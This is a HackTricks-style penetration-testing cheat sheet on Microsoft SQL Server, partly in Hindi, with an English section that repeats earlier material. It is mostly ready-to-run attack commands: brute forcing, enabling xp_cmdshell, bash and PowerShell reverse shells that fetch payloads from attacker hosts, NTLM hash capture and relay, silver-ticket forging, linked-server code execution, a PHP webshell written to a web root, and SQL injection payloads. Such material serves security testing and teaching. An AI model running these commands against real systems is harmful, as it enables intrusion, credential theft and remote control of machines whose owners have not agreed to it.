1433 - Pentesting MSSQL - Microsoft SQL Server

Tip

AWS Hacking सीखें & अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking सीखें & अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking सीखें & अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE) assessment tracks (ARTA/GRTA/AzRTA) और Linux Hacking Expert (LHE) के लिए full HackTricks Training catalog ब्राउज़ करें।

HackTricks का समर्थन करें

Basic Information

From wikipedia:

Microsoft SQL Server Microsoft द्वारा विकसित एक relational database management system है। एक database server के रूप में, यह एक software product है जिसका मुख्य कार्य अन्य software applications द्वारा अनुरोधित data को store और retrieve करना है—जो या तो उसी computer पर या network (including the Internet) के across किसी दूसरे computer पर चल सकते हैं।

Default port: 1433

1433/tcp open  ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM

Managed Database-as-a-Service (DBaaS) पर Landing

“owning the host” पर निर्भर हर चीज़ (जैसे privilege escalation, lateral movement, और OS command execution) DBaaS में मौजूद नहीं रहती। इन environments में pentesting को application-layer exploitation, SQL logic के जरिए data exfiltration, misconfigured IAM roles, या खराब network/VPC design की ओर pivot करना होता है। उदाहरण के लिए, Amazon RDS documentation स्पष्ट रूप से बताती है कि xp_cmdshell और TRUSTWORTHY database property supported नहीं हैं।

Warning

आपको एक database endpoint मिलता है, server नहीं। cloud provider host OS, database engine binaries, और कई security policies को manage करता है।

Default MS-SQL System Tables

  • master Database: यह database महत्वपूर्ण है क्योंकि यह SQL Server instance के सभी system-level details को capture करता है।
  • msdb Database: SQL Server Agent alerts और jobs के लिए scheduling manage करने में इस database का उपयोग करता है।
  • model Database: SQL Server instance पर हर नए database के लिए blueprint की तरह काम करता है, जहाँ size, collation, recovery model, और अधिक जैसे किसी भी बदलाव को नए बने databases में mirrored किया जाता है।
  • Resource Database: एक read-only database जो SQL Server के साथ आने वाले system objects को रखता है। ये objects physically Resource database में stored होते हैं, लेकिन logically हर database के sys schema में प्रस्तुत किए जाते हैं।
  • tempdb Database: transient objects या intermediate result sets के लिए temporary storage area के रूप में काम करता है।

Enumeration

Automatic Enumeration

अगर आपको service के बारे में कुछ भी नहीं पता है:

nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
msf> use auxiliary/scanner/mssql/mssql_ping

Tip

यदि आपके पास credentials नहीं हैं तो आप उन्हें guess करने की कोशिश कर सकते हैं। आप nmap या metasploit का उपयोग कर सकते हैं। सावधान रहें, यदि आप किसी existing username के साथ कई बार login fail करते हैं तो आप accounts block कर सकते हैं।

Metasploit (need creds)

#Set USERNAME, RHOSTS and PASSWORD
#Set DOMAIN and USE_WINDOWS_AUTHENT if domain is used

#Steal NTLM
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer #Steal NTLM hash, before executing run Responder

#Info gathering
msf> use admin/mssql/mssql_enum #Security checks
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump

#Search for insteresting data
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf

#Privesc
msf> use exploit/windows/mssql/mssql_linkcrawler
msf> use admin/mssql/mssql_escalate_execute_as #If the user has IMPERSONATION privilege, this will try to escalate
msf> use admin/mssql/mssql_escalate_dbowner #Escalate from db_owner to sysadmin

#Code execution
msf> use admin/mssql/mssql_exec #Execute commands
msf> use exploit/windows/mssql/mssql_payload #Uploads and execute a payload

#Add new admin user from meterpreter session
msf> use windows/manage/mssql_local_auth_bypass

Brute force

RID Brute Force के जरिए User Enumeration

आप MSSQL के माध्यम से domain users को RIDs (Relative Identifiers) को brute-force करके enumerate कर सकते हैं। यह technique तब उपयोगी है जब आपके पास valid credentials हों लेकिन privileges सीमित हों:

# Using NetExec (nxc) - formerly CrackMapExec
nxc mssql <IP> --local-auth -u <username> -p '<password>' --rid-brute 5000

# Examples:
nxc mssql 10.129.234.50 --local-auth -u sqlguest -p 'zDPBpaF4FywlqIv11vii' --rid-brute 5000
nxc mssql 10.10.10.59 -u sa -p 'P@ssw0rd' --rid-brute 10000

# Without --local-auth for domain accounts
nxc mssql 10.10.10.59 -u DOMAIN\\user -p 'password' --rid-brute 5000

MSSQL - Microsoft SQL Server

Introduction

MSSQL, या Microsoft SQL Server, Microsoft की एक relational database management system है। आमतौर पर यह Windows server पर चलती है, हालांकि Linux पर भी उपलब्ध है। इसके अलावा, एक Azure managed instance भी मौजूद है जो इसे cloud में चलाने देती है।

यह डिफ़ॉल्ट रूप से TCP/1433 पर सुनती है, और क्लाइंट मशीनों के लिए named pipes सक्षम कर सकती है, जिससे एक Windows host पर local access संभव होता है। Microsoft ने remote access के लिए कई अतिरिक्त ports भी बनाए हैं, जैसे:

  • TCP/2383 - Analysis Services
  • TCP/2382 - Analysis Services redirector
  • TCP/135 - SQL Server Browser service (instance discovery)
  • UDP/1434 - SQL Server Browser service (named instance discovery)

यदि SQL Server cluster का हिस्सा हो, तो वह कई hosts के बीच वितरित हो सकता है और सभी hosts के लिए वही configuration उपयोग कर सकता है।

Common MSSQL Terminology
  • Instance: SQL Server की एक running copy
  • Database: कई संबंधित tables का collection
  • Table: rows और columns के साथ data को व्यवस्थित करने वाली संरचना
  • Schema: tables, views, procedures और अन्य objects को व्यवस्थित करने का तरीका
  • View: एक virtual table जो एक query के result set पर आधारित होती है
  • Stored Procedure: SQL statements का पुन: उपयोग करने योग्य set
  • Trigger: ऐसा special stored procedure जो किसी event पर automatic रूप से execute होता है
  • Primary Key: किसी row के लिए unique identifier
  • Foreign Key: tables के बीच संबंध स्थापित करने वाला field
  • Index: data retrieval को तेज़ करने वाली data structure
  • Transaction: SQL operations की एक logical unit
  • Join: tables के बीच rows को combine करने वाला operation
  • Normalization: data redundancy को कम करने के लिए data को व्यवस्थित करना
  • ACID: Atomicity, Consistency, Isolation, Durability
  • T-SQL: Microsoft की SQL language extension
  • CRUD: Create, Read, Update, Delete
  • SSMS: SQL Server Management Studio, SQL Server के लिए एक graphical interface
  • SMB: Server Message Block, file sharing के लिए इस्तेमाल होने वाला protocol
  • UNC path: network share को access करने के लिए path format
  • Linked Servers: ऐसे server connections जो एक server को दूसरे server पर queries execute करने देते हैं

Common MSSQL commands

Get an MSSQL connection:

# Using credentials
mssqlclient.py -windows-auth domain.local/username:password@10.10.10.10

# Using a shell
mssqlclient.py -windows-auth domain.local/username@10.10.10.10 -windows-auth

# Using kerberos
mssqlclient.py domain.local/username@10.10.10.10 -k -no-pass

Get information about the MSSQL instance:

# Check the version
select @@version;

# Check the user you're running as
select user_name();

# Check your current database
select db_name();

# Check if you are a sysadmin
SELECT is_srvrolemember('sysadmin');

If the current user has public permissions on the database, it is possible to enable xp_cmdshell with:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Then commands can be executed:

EXEC xp_cmdshell 'whoami'

The same can be done through OPENROWSET if xp_cmdshell is disabled, although that also requires ad hoc distributed queries to be enabled:

SELECT * FROM OPENROWSET('SQLOLEDB', 'Server=localhost;Trusted_Connection=yes;', 'set nocount on; exec master..xp_cmdshell "whoami"')

By default, the MSSQL service account can access local files, but it may also use domain credentials. This can be useful to access network resources and use authenticated domains on remote systems. There are several useful commands for this:

SELECT @@servername;
SELECT @@servicename;
SELECT servicename, service_account FROM sys.dm_server_services;

Common MSSQL functions

CommandDescription
@@versionCurrent version of MSSQL
user_name()Current user
db_name()Current database
host_name()Current machine hostname
suser_name()Login name associated with the current security context
system_userThe system user name
is_srvrolemember('sysadmin')Checks if the current user is a sysadmin

Obtaining General Information

-- Get SQL Server version and edition
SELECT @@version, SERVERPROPERTY('Edition');

-- Get database names
SELECT name FROM master.dbo.sysdatabases;

-- Get table names in the current database
SELECT * FROM information_schema.tables;

-- Get current user name
SELECT user_name();

Useful databases and tables

  • master: Stores metadata and system configuration; contains all logins and linked servers
  • model: Used as a template for creating new databases
  • msdb: Stores jobs, alerts, and backup history
  • tempdb: Temporary database for intermediate processing and sorting
  • information_schema: Views that provide metadata about the database
  • sys.*: System catalog views and objects
  • sys.database_principals: Users, roles, and application roles in the database
  • sys.sql_logins: SQL Server logins
  • sys.server_principals: Server-level logins and roles
  • sys.servers: Linked servers
  • sys.tables: Tables in the current database
  • sys.columns: Columns in tables
  • sys.objects: Database objects
  • sys.syslogins: Legacy view of server logins
  • sys.dm_exec_sessions: Current user sessions
  • sys.dm_exec_requests: Active requests
  • sys.dm_exec_connections: Connection information
  • sys.configurations: Server configuration settings
  • sys.triggers: Database triggers
  • sys.views: Views in the database
  • sys.procedures: Stored procedures in the database
  • sys.database_permissions: Permissions granted in the database
  • sys.server_permissions: Server-level permissions

Read local files

To read local files or remotely fetch files from a computer we can use:

SELECT * FROM OPENROWSET(BULK N'C:\Windows\win.ini', SINGLE_CLOB) AS Contents;

To read files from the network using UNC paths, we can use a local Windows filesystem path to include a file from a remote server, just like with xp_dirtree or xp_fileexist:

SELECT * FROM OPENROWSET(BULK '\\10.10.10.10\share\file.txt', SINGLE_CLOB) AS Contents;

Local files with BULK INSERT:

CREATE TABLE foo(t varchar(100));
BULK INSERT foo FROM 'C:\windows\win.ini';
SELECT * FROM foo;

Execute commands

xp_cmdshell

EXEC xp_cmdshell 'whoami.exe'

Spawning a shell

EXEC master..xp_cmdshell 'whoami'

To get a reverse shell, you can use:

; -- comment to end previous command
EXEC xp_cmdshell 'bash -c "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1"'

Command execution via SQL injection

'; EXECUTE('xp_cmdshell ''whoami'''); --

Enable xp_cmdshell

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Write local files

MSSQL can write local files or binaries with bulk insert or xp_cmdshell. For example, from a shell we can use:

echo test > C:\windows\temp\test.txt

Or, with bulk insert:

CREATE TABLE foo (line varchar(8000));
BULK INSERT foo FROM '\\10.10.10.10\share\file.txt';

Read and write file over the network

To read and write files over the network, we can use xp_cmdshell to get a shell, then use curl or powershell to access file shares:

EXEC xp_cmdshell 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(''http://10.10.10.10/file.ps1'')"';

Capture NTLM Hashes

NTLM hashes can be captured by forcing MSSQL to authenticate to a remote SMB server. This can be done using xp_dirtree, xp_fileexist, or BACKUP/RESTORE commands with a remote path. Examples include:

EXEC master..xp_dirtree '\\10.10.10.10\share\';
EXEC master..xp_fileexist '\\10.10.10.10\share\file';
BACKUP LOG [TESTING] TO DISK = '\\10.10.10.10\share\file';
RESTORE DATABASE [TESTING] FROM DISK = '\\10.10.10.10\share\file';

Steal NetNTLM hash/relay attack

SSRP (SQL Server Resolution Protocol) supports username hash relaying (authentication forwarding) by leveraging the TDS protocol. This means that if an attacker gains the initial authentication request for one MSSQL server, they can relay it to another server and authenticate successfully without knowing the user’s password.

Using this technique, if a user authenticates to a SQL Server exposed to the internet, an attacker can capture the NetNTLM hash and forward it to another server that trusts NTLM authentication, potentially gaining unauthorized access.

For example, if a SQL Server instance is configured to use NTLM authentication, an attacker can intercept the authentication exchange and relay it to a different MSSQL server that accepts NTLM. This may allow access to databases or even remote command execution if the target server has weak permissions or misconfigurations.

SQL Server Auditing

To audit SQL Server, we can create a server audit and specify which events to capture. The audit logs are stored as files, and we can configure them to write to a specific directory. Example:

CREATE SERVER AUDIT SQLServerAudit
TO FILE (FILEPATH = 'C:\AuditLogs\')
WITH (ON_FAILURE = CONTINUE);

To set the audit specification and select which actions to audit:

CREATE SERVER AUDIT SPECIFICATION AuditSpec
FOR SERVER AUDIT SQLServerAudit
ADD (FAILED_LOGIN_GROUP),
ADD (SUCCESSFUL_LOGIN_GROUP)
WITH (STATE = ON);

Triggering authentication leaks

Through SQL Server features that cause the server to authenticate to an external resource, an attacker can trigger authentication leaks and capture hashes. Common examples include:

  • xp_dirtree
  • xp_fileexist
  • BACKUP to a UNC path
  • RESTORE from a UNC path
  • BULK INSERT
  • fn_xe_file_target_read_file

By forcing the server to access a malicious SMB share, the attacker’s server can capture NTLM authentication attempts.

Database links, or Linked Servers, allow one MSSQL server to query or execute commands on another server. This can be abused to move laterally across a network or execute remote commands.

Useful queries to enumerate Linked Servers:

EXEC sp_linkedservers;
SELECT * FROM sys.servers;
EXEC sp_helplinkedsrvlogin;

To execute a command on a linked server:

EXEC ('xp_cmdshell ''whoami''') AT [LINKEDSERVER];

Or using OPENQUERY:

SELECT * FROM OPENQUERY([LINKEDSERVER], 'SELECT @@version');

Impersonation

If a login has the IMPERSONATE permission, it may impersonate other users or logins. This can be used to escalate privileges or access resources as another account.

Useful queries:

SELECT * FROM sys.database_permissions WHERE permission_name = 'IMPERSONATE';
SELECT * FROM sys.server_permissions WHERE permission_name = 'IMPERSONATE';

To impersonate:

EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER;
REVERT;

References

[snippet]
MSSQL                    10.129.234.50   1433   DC               1104: REDELEGATE\Christine.Flanders
MSSQL                    10.129.234.50   1433   DC               1105: REDELEGATE\Marie.Curie
MSSQL                    10.129.234.50   1433   DC               1106: REDELEGATE\Helen.Frost
MSSQL                    10.129.234.50   1433   DC               1107: REDELEGATE\Michael.Pontiac
MSSQL                    10.129.234.50   1433   DC               1108: REDELEGATE\Mallory.Roberts
MSSQL                    10.129.234.50   1433   DC               1109: REDELEGATE\James.Dinkleberg
[snippet]

Parameters:

  • --local-auth: डोमेन के बजाय local authentication का उपयोग करें
  • --rid-brute <max_rid>: निर्दिष्ट संख्या तक RIDs को brute force करें (default: 4000)
  • -u: Username
  • -p: Password

यह technique sequential RIDs से जुड़े account information के लिए MSSQL server को query करके users को enumerate करेगी।

Manual Enumeration

Login

MSSQLPwner

# Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt

# Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt

# Bruteforce using tickets against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt

# Bruteforce using passwords against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt

# Bruteforce using hashes against the hosts listed on the hosts.txt
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt

# Using Impacket mssqlclient.py
mssqlclient.py [-db volume] <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>
## Recommended -windows-auth when you are going to use a domain. Use as domain the netBIOS name of the machine
mssqlclient.py [-db volume] -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>

# Using sqsh
sqsh -S <IP> -U <Username> -P <Password> -D <Database>
## In case Windows Auth using "." as domain name for local user
sqsh -S <IP> -U .\\<Username> -P <Password> -D <Database>
## In sqsh you need to use GO after writting the query to send it
1> select 1;
2> go

सामान्य Enumeration

# Get version
select @@version;
# Get user
select user_name();
# Get databases
SELECT name FROM master.dbo.sysdatabases;
# Use database
USE master

#Get table names
SELECT * FROM <databaseName>.INFORMATION_SCHEMA.TABLES;
#List Linked Servers
EXEC sp_linkedservers
SELECT * FROM sys.servers;
#List users
select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
#Create user with sysadmin privs
CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123!'
EXEC sp_addsrvrolemember 'hacker', 'sysadmin'

#Enumerate links
enum_links
#Use a link
use_link [NAME]

यूज़र प्राप्त करें

Types of MSSQL Users

# Get all the users and roles
select * from sys.database_principals;
## This query filters a bit the results
select name,
create_date,
modify_date,
type_desc as type,
authentication_type_desc as authentication_type,
sid
from sys.database_principals
where type not in ('A', 'R')
order by name;

## Both of these select all the users of the current database (not the server).
## Interesting when you cannot acces the table sys.database_principals
EXEC sp_helpuser
SELECT * FROM sysusers

Get Permissions

  1. Securable: SQL Server द्वारा access control के लिए managed resources को Defined किया जाता है। इन्हें इस प्रकार वर्गीकृत किया गया है:
  • Server – उदाहरणों में databases, logins, endpoints, availability groups, और server roles शामिल हैं।
  • Database – उदाहरणों में database role, application roles, schema, certificates, full text catalogs, और users शामिल हैं।
  • Schema – इसमें tables, views, procedures, functions, synonyms, आदि शामिल हैं।
  1. Permission: SQL Server securables से associated, ALTER, CONTROL, और CREATE जैसी permissions किसी principal को granted की जा सकती हैं। Permissions का management दो levels पर होता है:
  • Server Level logins का उपयोग करके
  • Database Level users का उपयोग करके
  1. Principal: यह term उस entity को refer करती है जिसे किसी securable पर permission granted की जाती है। Principals में मुख्य रूप से logins और database users शामिल होते हैं। Securables तक access का control permissions को grant या deny करके, या logins और users को ऐसे roles में शामिल करके किया जाता है जिनमें access rights होते हैं।
# Show all different securables names
SELECT distinct class_desc FROM sys.fn_builtin_permissions(DEFAULT);
# Show all possible permissions in MSSQL
SELECT * FROM sys.fn_builtin_permissions(DEFAULT);
# Get all my permissions over securable type SERVER
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
# Get all my permissions over a database
USE <database>
SELECT * FROM fn_my_permissions(NULL, 'DATABASE');
# Get members of the role "sysadmin"
Use master
EXEC sp_helpsrvrolemember 'sysadmin';
# Get if the current user is sysadmin
SELECT IS_SRVROLEMEMBER('sysadmin');
# Get users that can run xp_cmdshell
Use master
EXEC sp_helprotect 'xp_cmdshell'

Tricks

OS Commands Execute करें

Caution

ध्यान दें कि कमांड्स execute करने में सक्षम होने के लिए केवल xp_cmdshell का enabled होना ही पर्याप्त नहीं है, बल्कि xp_cmdshell stored procedure पर EXECUTE permission होना भी ज़रूरी है। आप यह जान सकते हैं कि कौन (sysadmins को छोड़कर) xp_cmdshell का उपयोग कर सकता है:

Use master
EXEC sp_helprotect 'xp_cmdshell'

# Username + Password + CMD command
crackmapexec mssql -d <Domain name> -u <username> -p <password> -x "whoami"
# Username + Hash + PS command
crackmapexec mssql -d <Domain name> -u <username> -H <HASH> -X '$PSVersionTable'

# Check if xp_cmdshell is enabled
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';

# This turns on advanced options and is needed to configure xp_cmdshell
sp_configure 'show advanced options', '1'
RECONFIGURE
#This enables xp_cmdshell
sp_configure 'xp_cmdshell', '1'
RECONFIGURE

#One liner
EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

# Quickly check what the service account is via xp_cmdshell
EXEC master..xp_cmdshell 'whoami'
# Get Rev shell
EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'

# Bypass blackisted "EXEC xp_cmdshell"
'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' —

MSSQLPwner

# Executing custom assembly on the current server with windows authentication and executing hostname command
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth custom-asm hostname

# Executing custom assembly on the current server with windows authentication and executing hostname command on the SRV01 linked server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 custom-asm hostname

# Executing the hostname command using stored procedures on the linked SRV01 server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec hostname

# Executing the hostname command using stored procedures on the linked SRV01 server with sp_oacreate method
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate

WMI-based remote SQL collection (sqlcmd + CSV export)

Operators IIS/app tier से SQL Servers की तरफ pivot कर सकते हैं, WMI का इस्तेमाल करके एक छोटा batch execute करके जो MSSQL से authenticate करता है और ad-hoc queries चलाता है, फिर results को CSV में export करता है। इससे collection simple रहती है और admin activity के साथ blend हो जाती है।

Example mssq.bat

@echo off
rem Usage: mssq.bat <server> <user> <pass> <"SQL"> <out.csv>
set S=%1
set U=%2
set P=%3
set Q=%4
set O=%5
rem Remove headers, trim trailing spaces, CSV separator = comma
sqlcmd -S %S% -U %U% -P %P% -Q "SET NOCOUNT ON; %Q%" -W -h -1 -s "," -o "%O%"

इसे WMI के साथ remotely invoke करें

wmic /node:SQLHOST /user:DOMAIN\user /password:Passw0rd! process call create "cmd.exe /c C:\\Windows\\Temp\\mssq.bat 10.0.0.5 sa P@ssw0rd \"SELECT TOP(100) name FROM sys.tables\" C:\\Windows\\Temp\\out.csv"

PowerShell विकल्प

$cmd = 'cmd.exe /c C:\\Windows\\Temp\\mssq.bat 10.0.0.5 sa P@ssw0rd "SELECT name FROM sys.databases" C:\\Windows\\Temp\\dbs.csv'
Invoke-WmiMethod -ComputerName SQLHOST -Class Win32_Process -Name Create -ArgumentList $cmd

Notes

  • sqlcmd अनुपलब्ध हो सकता है; osql, PowerShell Invoke-Sqlcmd, या System.Data.SqlClient का उपयोग करने वाले one‑liner पर वापस जाएँ।
  • quoting को सावधानी से use करें; long/complex queries को file या Base64‑encoded argument के जरिए देना आसान होता है, जिसे batch/PowerShell stub के अंदर decode किया जाए।
  • CSV को SMB के जरिए exfil करें (जैसे, \SQLHOST\C$\Windows\Temp से copy करें) या compress करके अपने C2 के जरिए move करें।

Get hashed passwords

SELECT * FROM master.sys.syslogins;

NetNTLM hash चुराएं / Relay attack

आपको authentication में उपयोग किए गए hash को capture करने के लिए एक SMB server शुरू करना चाहिए (impacket-smbserver या responder जैसे).

xp_dirtree '\\<attacker_IP>\any\thing'
exec master.dbo.xp_dirtree '\\<attacker_IP>\any\thing'
EXEC master..xp_subdirs '\\<attacker_IP>\anything\'
EXEC master..xp_fileexist '\\<attacker_IP>\anything\'

# Capture hash
sudo responder -I tun0
sudo impacket-smbserver share ./ -smb2support
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer

MSSQLPwner

# Issuing NTLM relay attack on the SRV01 server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250

# Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250

# Issuing NTLM relay attack on the local server with custom command
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250

Warning

आप यह जांच सकते हैं कि कौन (sysadmins के अलावा) उन MSSQL functions को चलाने की permissions रखता है:

Use master;
EXEC sp_helprotect 'xp_dirtree';
EXEC sp_helprotect 'xp_subdirs';
EXEC sp_helprotect 'xp_fileexist';

responder या Inveigh जैसे tools का उपयोग करके NetNTLM hash को steal करना संभव है।
आप इन tools का उपयोग कैसे करें, यह यहाँ देख सकते हैं:

Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

NetNTLMv2 capture से MSSQL silver ticket (PAC group injection)

  • SQL Server service account का NetNTLMv2 xp_dirtree '\\\\<attacker_ip>\\share' के जरिए Responder के साथ capture करें (crack करने के लिए Hashcat mode 5600)।
  • recovered password से service NTLM hash derive करें:
python3 - <<'PY'
import hashlib
print(hashlib.new("md4", "<PASSWORD>".encode("utf-16le")).hexdigest())
PY
  • SELECT SUSER_SID('DOMAIN\\Domain Users'); के साथ domain SID bytes प्राप्त करें (RID = अंतिम 4 bytes, little endian)। sysadmin देने वाले group को ढूंढने के लिए nxc mssql ... --rid-brute से RIDs map/brute करें (जैसे, RID 1105)।
  • MSSQL SPN के लिए एक silver ticket forge करें, जिसमें privileged group RID को PAC में inject किया गया हो:
ticketer.py -nthash <SERVICE_NTLM> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn MSSQLSvc/<fqdn>:1433 -groups <GROUP_RID> <user_to_impersonate>
KRB5CCNAME=<user_to_impersonate>.ccache mssqlclient.py -no-pass -k <fqdn>
  • ज़रूरत होने पर xp_cmdshell सक्षम करें; कमांड्स SQL Server service account के रूप में चलते हैं, भले ही forged ticket के जरिए impersonate किया गया हो।

यह पोस्ट पढ़ें ताकि इस feature का दुरुपयोग कैसे करें, इसके बारे में अधिक जानकारी मिल सके:

MSSQL AD Abuse

Linked-server credential mapping -> remote sysadmin -> OS RCE

Linked servers को non-self login mapping (Local Login -> Remote Login) के साथ configure किया जा सकता है। ऐसे में, पहले SQL Server पर एक low-privileged login दूसरे पर queries execute कर सकता है mapped remote principal के रूप में। यह उसी तरह काम करता है, भले ही linked instance किसी दूसरे domain या forest में हो।

सबसे पहले links और उनके mappings enumerate करें:

EXEC sp_linkedservers;
EXEC sp_helplinkedsrvlogin '<LINK_NAME>';

फिर सत्यापित करें कि remote side पर आप कौन सा account बनते हैं और क्या वह sysadmin है:

EXEC ('SELECT SYSTEM_USER') AT [<LINK_NAME>];
EXEC ('SELECT IS_SRVROLEMEMBER(''sysadmin'')') AT [<LINK_NAME>];

यदि mapped remote login sysadmin है, तो linked server एक remote code execution primitive बन जाता है क्योंकि आप far-end instance को reconfigure कर सकते हैं और OS commands को SQL Server service account के रूप में चला सकते हैं:

EXEC ('sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [<LINK_NAME>];
EXEC ('sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [<LINK_NAME>];
EXEC ('EXEC xp_cmdshell ''whoami''') AT [<LINK_NAME>];

impacket-mssqlclient का उपयोग करके, वही workflow आमतौर पर तेज़ होता है:

mssqlclient.py -windows-auth <DOMAIN>/<USER>:<PASSWORD>@<SQLHOST>
# Inside the SQL shell:
enum_links
use_link [<LINK_NAME>]
enable_xp_cmdshell
xp_cmdshell whoami

सिंगल-Command execution को एक interactive shell में upgrade करने के लिए, xp_cmdshell के through एक reverse shell launch करें:

xp_cmdshell powershell -e <BASE64_BLOB>
rlwrap -cAr nc -lnvp 443

Tip

यदि xp_cmdshell disabled है, तो initial error अक्सर confirm करता है कि sp_configure / RECONFIGURE intended enablement path है। साथ ही exported policy files जैसे Policy_Backup.inf (secedit /export output) भी देखें, क्योंकि ये local rights assignments (SeImpersonatePrivilege, SeDebugPrivilege, Kerberos skew, SMB signing, NTLM hardening) expose कर सकते हैं, जो SQL host पर land करने के बाद next privilege-escalation step चुनने में मदद करते हैं।

Write Files

MSSQL का उपयोग करके files लिखने के लिए, हमें Ole Automation Procedures को enable करना होगा, जिसके लिए admin privileges चाहिए, और फिर file create करने के लिए कुछ stored procedures execute करनी होंगी:

# Enable Ole Automation Procedures
sp_configure 'show advanced options', 1
RECONFIGURE

sp_configure 'Ole Automation Procedures', 1
RECONFIGURE

# Create a File
DECLARE @OLE INT
DECLARE @FileID INT
EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
EXECUTE sp_OADestroy @FileID
EXECUTE sp_OADestroy @OLE

OPENROWSET के साथ file पढ़ें

By default, MSSQL operating system में किसी भी file पर read की अनुमति देता है, जिस पर account के पास read access हो। हम निम्न SQL query का उपयोग कर सकते हैं:

SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents

हालाँकि, BULK विकल्प के लिए ADMINISTER BULK OPERATIONS या ADMINISTER DATABASE BULK OPERATIONS अनुमति की आवश्यकता होती है।

# Check if you have it
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='ADMINISTER BULK OPERATIONS' OR permission_name='ADMINISTER DATABASE BULK OPERATIONS';

SQLi के लिए Error-based vector:

https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:\Windows\win.ini',SINGLE_CLOB)+R(x))--

RCE/Read files executing scripts (Python and R)

MSSQL आपको Python और/या R में scripts execute करने की अनुमति दे सकता है। यह code xp_cmdshell का उपयोग करके commands execute करने वाले user से अलग user के under execute होगा।

‘R’ “Hellow World!” execute करने की कोशिश का example, जो काम नहीं करता:

configured python का उपयोग करके कई actions perform करने का example:

# Print the user being used (and execute commands)
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
#Open and read a file
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
#Multiline
EXECUTE sp_execute_external_script @language = N'Python', @script = N'
import sys
print(sys.version)
'
GO

Registry पढ़ना

Microsoft SQL Server multiple extended stored procedures प्रदान करता है जो आपको केवल नेटवर्क ही नहीं बल्कि file system और यहां तक कि Windows Registry के साथ भी interact करने देते हैं**:**

RegularInstance-Aware
sys.xp_regreadsys.xp_instance_regread
sys.xp_regenumvaluessys.xp_instance_regenumvalues
sys.xp_regenumkeyssys.xp_instance_regenumkeys
sys.xp_regwritesys.xp_instance_regwrite
